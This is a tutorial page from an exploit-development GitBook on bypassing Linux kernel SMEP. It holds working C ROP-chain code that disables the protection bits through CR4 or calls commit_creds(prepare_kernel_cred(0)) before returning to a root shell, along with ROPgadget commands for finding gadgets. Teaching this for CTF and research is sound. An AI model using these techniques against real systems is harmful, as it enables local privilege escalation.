Breaking Bits
  • What this gitbook is
  • Vulnerability Discovery
    • Reverse Engineering
      • Modern Vulnerability Research Techniques on Embedded Systems
      • Remote Dynamic Blackbox Java App Analysis
    • Emulation
      • QEMU Usermode Tracing
      • Building QEMU on Ubuntu
    • Fuzzing with AFL
    • Automated Vulnerability Discovery
      • Buffer Overflows
      • Analyzing Functions
    • Automatic Exploit Generation
      • Automatic Rop Chain Generation
  • CTF
  • Battelle Shmoocon 2024
    • Time Jump Planner
  • Spaceheros CTF 2022
    • RE: Shai-Hulud
  • UMDCTF 2020
    • UMDCTF 2020: Evil Santa's Mysterious Box of Treats
  • UMDCTF 2022
    • Tracestory
  • Spaceheroes CTF 2023
    • Everything-is-wrong
  • US CyberGames RE-Cruise 4
  • Firmware Emulator
  • Interactive Firmware Emulator Usage
  • Recreating CVE-2015-1187 in the DIR-820L
  • Exploit Development
    • Linux kernel exploit development
      • Setup
      • Interacting with Kernel Modules
      • Kernel stack cookies
      • Kernel Address Space Layout Randomization (KALSR)
      • Supervisor mode execution protection (SMEP)
      • Kernel page table isolation (KPTI)
      • Supervisor Mode Access Prevention (SMAP)
Powered by GitBook
On this page
  • Before Linux Kernel 5.1
  • If SMEP bit is pinned

Was this helpful?

  1. Exploit Development
  2. Linux kernel exploit development

Supervisor mode execution protection (SMEP)

PreviousKernel Address Space Layout Randomization (KALSR)NextKernel page table isolation (KPTI)

Last updated 3 years ago

Was this helpful?

is a mitigation introduced by google engineers in the Linux kernel that prevents ret2usr exploits from working. While in kernel mode (ring0) the process can not execute from pages in userspace. This is a hardware feature offered by intel chips and is controlled by the . The is the same mitigation on ARM devices, but it's . (Also see )

We can check for SMEP through /proc/cpuinfo:

# cat /proc/cpuinfo | grep smep
flags		: fpu de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx lm constant_tsc nopl xtopology cpuid pni cx16 hypervisor smep smap

Before Linux Kernel 5.1

One technique proposed through a is to zero out the 20th bit of the CR4 register. To do this Andrey Konovalov used a func(data) primitive to call native_write_cr4(val) with val having the 20th (and 21st) bit set to 0.

to kernel source shows the function accept an arbitrary value and attempts to set the CR4 register to the value provided. However we can see that the function mentions some bit pinning!

void native_write_cr4(unsigned long val)
{
	unsigned long bits_changed = 0;

set_register:
	asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

	if (static_branch_likely(&cr_pinning)) {
		if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
			bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
			val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
			goto set_register;
		}
		/* Warn after we've corrected the changed bits. */
		WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
			  bits_changed);
	}
}

It turns out that the kernel ensures that those values are not changed after the CPU is finished initializing and specifies just a couple lines above this function, which bits those are:

/* These bits should not change their value after CPU init is finished. */
static const unsigned long cr4_pinned_mask =
	X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP | X86_CR4_FSGSBASE;

We need the address to native_write_cr4 and a gadget to fill our RDI register as it will contain the argument the function expects. Using ROPgadget we can find a gadget and using either our leak from before or a read off of /proc/kallsyms, we can get the address of native_write_cr4

A quick note here on rop gadget finding for kernels. Make sure you're not running ROPGadget on the bzimage since that's the entire boot image containing the vmlinux kernel image. There is an extract-vmlinux script located inside of the kernel tree that extracts out the vmlinux kernel that we want to use to find our gadgets.

$ ./linux-5.4/scripts/extract-vmlinux linux-5.4/arch/x86/boot/bzImage > vmlinux
$ ROPgadget --binary vmlinux > kernel_gadgets
$ cat kernel_gadgets| grep ': pop rdi ; ret'
0x000000000003be1d : pop rdi ; ret

Using these pieces we can construct a small ROP chain then ends with a jump into our give_me_root function:

unsigned long pop_rdi_ret = 0x3be1d;
unsigned long native_write_cr4_offset = 0x2ddf0;

void overwrite_pc(int fd, unsigned long stack_cookie, unsigned long kernel_base) {
  unsigned long *buf = NULL; //[BUF_SIZE];
  unsigned int cookie_offset = 16;
  int bytes_written;

  buf = malloc(BUF_SIZE);
  if (buf == NULL)
    exit_and_log("Failed to malloc\n");

  memset(buf, '\x00', BUF_SIZE);

  buf[cookie_offset] = stack_cookie;
  buf[cookie_offset + 1] = 0x4141414141414141;          // rbx
  buf[cookie_offset + 2] = kernel_base + pop_rdi_ret;
  buf[cookie_offset + 3] = 0x6f0; // or 0x407f0
  /*
   * 0x407f0 -> 0b1000000011111110000
   * 0x6f0 -> 0b11011110000
   */
  buf[cookie_offset + 4] = kernel_base + native_write_cr4;
  // Once SMEP is off, we can return to userspace pages again!
  buf[cookie_offset + 5] = (unsigned long)give_me_root;

  // After this write we won't return to the
  // rest of this function
  bytes_written = write(fd, buf, BUF_SIZE);

  printf("Write returned %d\n", bytes_written);

  free(buf);
}

If SMEP bit is pinned

If the SMEP bit is pinned, then we can't overwrite that part of the CR4 register with our own payload and we need to ROP for our prepare_kernel_cred and commit_creds calls. The steps we need to take are straight forward. We need to implement the pseudo assembly as ROP calls:

mov rdi, 0
call prepare_kernel_cred
mod rax, rdi
call commit_creds
swapgs
iretq

Running the previous ret2user payload will result in the following panic:

// 0xffffffff8103be1d : pop rdi ; ret
unsigned long pop_rdi_ret = 0xffffffff8103be1d;
// 0xffffffff81033b50 : mov rax, rdi ; ret
unsigned long mov_rax_rdi = 0xffffffff81033b50;
//0xffffffff81c00eaa : swapgs ; popfq ; ret
unsigned long swapgs_popfq_ret = 0xffffffff81c00eaa;
//ffffffff810240c2: 48 cf                 iretq  
unsigned long iretq = 0xffffffff810240c2;

void overwrite_pc(int fd, unsigned long stack_cookie, unsigned long kernel_base) {
  unsigned long *buf = NULL; //[BUF_SIZE];
  unsigned int cookie_offset = 16;
  int bytes_written;

  buf = malloc(BUF_SIZE);
  if (buf == NULL)
    exit_and_log("Failed to malloc\n");

  memset(buf, '\x00', BUF_SIZE);

  user_rip = (unsigned long)drop_shell;

  buf[cookie_offset] = stack_cookie;
  buf[cookie_offset + 1] = 0x4141414141414141;          // rbx
  buf[cookie_offset + 2] = pop_rdi_ret;
  buf[cookie_offset + 3] = 0 ; // Argument for prepare_kernel_cred
  buf[cookie_offset + 4] = prepare_kernel_cred;
  buf[cookie_offset + 5] = mov_rax_rdi; // move cred struct to argument
  buf[cookie_offset + 6] = commit_creds;
  buf[cookie_offset + 7] = swapgs_popfq_ret;
  buf[cookie_offset + 8] = 0xDEADBEEF; // value for popfq
  buf[cookie_offset + 9] = iretq; // swap from kernel to userspace
  buf[cookie_offset + 10] = user_rip; // <-- here is drop shell function
  buf[cookie_offset + 11] = user_cs;
  buf[cookie_offset + 12] = user_rflags;
  buf[cookie_offset + 13] = user_sp;
  buf[cookie_offset + 14] = user_ss;

  // After this write we won't return to the
  // rest of this function
  bytes_written = write(fd, buf, BUF_SIZE);

  printf("Write returned %d\n", bytes_written);

  free(buf);
}

Success!

These changes were introduced in and prevent us from over writing those bits using this function. For exploits before 5.1 (for CTFs) we can still use this technique and we need to execute a two gadget rop chain to call this function.

The process of generating the rop chain given the kernel is pretty straight forward and you won't run into any road bumps. My code for the overflow is and below:

Supervisor mode execution protection (SMEP)
20th bit in the CR4 register
called PXN
this article for Android
google project zero post
This link
Linux Kernel 5.1 here
shown here